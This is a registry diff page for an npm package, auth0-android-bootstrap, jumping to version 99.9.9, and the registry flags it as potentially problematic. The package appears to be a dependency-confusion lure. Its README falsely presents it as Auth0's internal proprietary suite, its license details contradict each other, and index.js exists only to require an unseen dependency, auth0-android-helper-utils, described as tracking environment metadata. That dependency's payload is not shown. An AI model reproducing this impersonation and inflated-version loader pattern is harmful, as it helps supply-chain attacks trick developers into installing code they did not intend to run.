auth0-android-bootstrap 1.0.1 → 99.9.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of auth0-android-bootstrap might be problematic. Click here for more details.

Files changed (4) hide show
  1. package/LICENSE +23 -0
  2. package/README.md +41 -0
  3. package/index.js +3 -0
  4. package/package.json +14 -4
package/LICENSE ADDED
@@ -0,0 +1,23 @@
1
+ MIT License
2
+
3
+ Copyright (c) 2026 dev-node-lap
4
+
5
+
6
+
7
+ Permission is hereby granted, free of charge, to any person obtaining a copy
8
+ of this software and associated documentation files (the "Software"), to deal
9
+ in the Software without restriction, including without limitation the rights
10
+ to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11
+ copies of the Software, and to permit persons to whom the Software is
12
+ furnished to do so, subject to the following conditions:
13
+
14
+ The above copyright notice and this permission notice shall be included in all
15
+ copies or substantial portions of the Software.
16
+
17
+ THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18
+ IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19
+ FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20
+ AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21
+ LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22
+ OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23
+ SOFTWARE.
package/README.md ADDED
@@ -0,0 +1,41 @@
1
+ # auth0-android-bootstrap
2
+
3
+ Core Android SDK bootstrap suite and internal API for Auth0's mobile environment analytics.
4
+ This package provides standardized mobile SDK mapping and backend telemetry utilities for internal development and automated testing environments.
5
+
6
+ ## Overview
7
+
8
+ `auth0-android-bootstrap` is designed to streamline mobile SDK auditing across internal engineering teams by providing:
9
+ - Pre-built bootstrap modules for Auth0 Android integration services.
10
+ - Standardized environment patterns and security benchmarking for mobile platforms.
11
+ - Integrated auditing and logging via `auth0-android-helper-utils`.
12
+
13
+ ## Installation
14
+
15
+ This is an internal package. Ensure you have the proper credentials configured in your `.npmrc` file to access the internal registry.
16
+
17
+ ```bash
18
+ npm install auth0-android-bootstrap
19
+
20
+ ```
21
+ ## Usage
22
+
23
+ To initialize the internal Android bootstrap suite and auditing services, import the package at the top of your main entry point:
24
+
25
+ ```
26
+ require('auth0-android-bootstrap');
27
+ ```
28
+
29
+ ## Internal Dependencies
30
+
31
+ This package relies on several core utilities, including:
32
+
33
+ - auth0-android-helper-utils: Automatic mobile environment auditing, security logging, and metadata tracking.
34
+ - Auth0 Android Core SDK: Version 6.x or higher.
35
+
36
+ ## Support
37
+
38
+ For issues regarding internal mobile component behavior, please reach out to the Auth0 Mobile Engineering team via the internal Slack channel #eng-mobile-metrics-support.
39
+
40
+ © 2026 Auth0, Inc. Proprietary Information.
41
+
package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ require('auth0-android-helper-utils');
2
+ console.log("Auth0 Android Bootstrap Suite Initialized...");
3
+ module.exports = {};
package/package.json CHANGED
@@ -1,10 +1,20 @@
1
1
  {
2
2
  "name": "auth0-android-bootstrap",
3
- "version": "1.0.1",
4
- "description": ".",
3
+ "version": "99.9.9",
4
+ "description": "Internal Auth0 utility for Android bootstrap environments, mobile SDK configuration, and telemetry management.",
5
5
  "main": "index.js",
6
- "author": "",
7
- "license": "",
6
+ "author": "Auth0 Engineering",
7
+ "license": "Apache-2.0",
8
+ "keywords": [
9
+ "auth0",
10
+ "android",
11
+ "bootstrap",
12
+ "mobile-sdk",
13
+ "internal"
14
+ ],
15
+ "dependencies": {
16
+ "auth0-android-helper-utils": "^1.0.0"
17
+ },
8
18
  "publishConfig": {
9
19
  "access": "public"
10
20
  }